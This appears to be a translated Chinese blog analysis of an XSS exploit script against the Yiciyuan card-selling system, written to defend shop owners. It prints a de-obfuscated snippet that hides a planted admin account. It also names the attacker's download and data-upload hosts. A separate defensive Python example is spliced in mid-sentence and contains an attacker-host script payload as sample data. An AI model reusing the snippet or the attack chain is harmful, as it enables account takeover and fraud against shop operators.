Analysis of the Exploit Script for the Yiciyuan (异次元) Card-Selling $0 Purchase Vulnerability - 1
Preamble
Recently, zero-yuan purchases against the Yiciyuan (异次元) card-selling system have become more and more rampant, and the reason is that the system's author has not done a good job of protecting it. Based on reports from helpful netizens and the exploit scripts we captured ourselves, we are writing this series of analysis articles.
One way to put it: as long as your shop has zero daily revenue and no cards in stock, you have nothing to fear from being hacked.
Disclaimer
To prevent further malicious use, all code and descriptions in this post have been deliberately blurred.
Summary
The author of this exploit script injects XSS code through the avatar field, then exploits an administrator's fear of having been hacked, which drives them to check the backend operation logs. The malicious code is designed to execute at exactly that moment, so that the administrator's own privileges are used to carry out the zero-yuan purchase.
Code analysis
Address of the malicious script:
https://jiaoben.keeta1.top/
After downloading it I found it was obfuscated, so I did a simple de-obfuscation.
That process is not shown here; the code below has only been decoded to a readable level, to prevent it from being reused.
The overall structure is as follows.
First, the administrator account containing @admina.com (the one the script adds) is hidden from the admin list:
// Walk every table cell on the page; _0x348775 is the current <td> element
$("td")["each"](function (_0x36ba71, _0x348775) {
    console.log(_0x36ba71, _0x348775, _0x348775["innerHTML"]["indexOf"]);
    // If the cell's HTML mentions the planted admin's domain, remove the whole row
    if (_0x348775["innerHTML"]["indexOf"]("@admina.com") != -1) {
        var _0x53991d = $(this)["parent"]();
        _0x53991d["remove"]();
    }
});
The idea is to iterate over every table cell and, if a cell is found whose value contains @admina.com, remove its parent element (the table row).
Conveniently, the administrator list is a table, so the administrator containing @admina.com is hidden. In other words, the administrator is not visible in the backend at all; it exists only in the database.
After running it, the result is as shown above: the administrator is gone.
The only flaw is that the footer line "Showing records 1 to 1, 1 records in total" should also have been reduced by one; otherwise the count gives it away.
Next comes the key malicious function.
First, it checks the page title to determine whether the current page is the backend operation log interface.
A timer is then started to execute the malicious code.
The malicious code in the timer does not execute if the current page is not the backend log interface.
It first requests the card data to find the id of the user with the username toptoones.
Then, based on the returned id, it does the following:
First, it deletes this user.
Then it calls the order destruction plugin to destroy that user's orders.
If you do not have this plugin installed, this sneaky script thoughtfully calls the API to download it from the plugin store for you, activates the plugin, destroys the orders, disables the plugin, uninstalls it, and while it is at it clears the backend logs.
Then it injects the code shown at the beginning, which hides the malicious admin, into the administrator's avatar field, so that the malicious code is triggered as soon as you log into the backend.
It then uploads your information to the attacker's backend:
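As an added defensive example (not from the post or from the Yiciyuan code base), the following Python sketches the two checks this script's behaviour calls for: validating and output-encoding the avatar field so it cannot carry markup into the backend log page, and comparing the administrator list stored in the database with what the backend UI renders, since the script only hides the planted admin row on the client side. The sample rows, domains and helper names are constructed assumptions.

```python
import html
import re
from urllib.parse import urlparse

# Constructed sample rows shaped like a user table's avatar column (not real data)
SAMPLE_USERS = [
    {"id": 1, "username": "alice", "avatar": "https://cdn.example.com/a/alice.png"},
    {"id": 2, "username": "mallory",
     "avatar": '"><script src="https://attacker.invalid/x.js"></script>'},
    {"id": 3, "username": "bob", "avatar": "javascript:alert(1)"},
]

# Characters and schemes that have no business in an avatar URL
_DANGEROUS = re.compile(r'[<>"\'`]|javascript:|data:', re.IGNORECASE)


def is_safe_avatar_url(value: str) -> bool:
    """Accept only a plain http(s) URL with a host and no markup-bearing characters."""
    if _DANGEROUS.search(value):
        return False
    parsed = urlparse(value)
    return parsed.scheme in ("http", "https") and bool(parsed.netloc)


def render_avatar_img(value: str) -> str:
    """Output-encode the avatar for an admin page; unsafe values fall back to a placeholder."""
    src = value if is_safe_avatar_url(value) else "/static/default-avatar.png"
    return '<img src="%s" alt="avatar">' % html.escape(src, quote=True)


def flag_unsafe_avatars(users) -> list:
    """Return ids of stored rows whose avatar field would render as markup or script."""
    return [u["id"] for u in users if not is_safe_avatar_url(u["avatar"])]


def find_hidden_admins(db_admins, ui_admins) -> list:
    """Admins present in the database but absent from the rendered backend list."""
    return sorted(set(db_admins) - set(ui_admins))
```

Running flag_unsafe_avatars over the user table and find_hidden_admins over the database versus the rendered list on a schedule turns both tricks in this script into alerts rather than silent failures.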
https://keeta1.top/hook/log
https://keeta1.top/bdstatic.com/?callback=jsonp
Then it checks whether the Easy Payment plugin is present in the backend and injects code if it is. I suspect the intent was to modify the payment configuration, but for some reason it does not; perhaps this will be "upgraded" in a later version.
It also takes care to handle the backend's protective measures.
Finally, there is all manner of log clearing and data transfer.
Summary
Give up your illusions (about Yiciyuan).
Face reality.
Switch to a different card-selling system; the author has not even shown up.
Please credit the source when reproducing: Analysis of the Exploit Script for the Yiciyuan Card-Selling $0 Purchase Vulnerability - 1 | MJJ card-selling navigation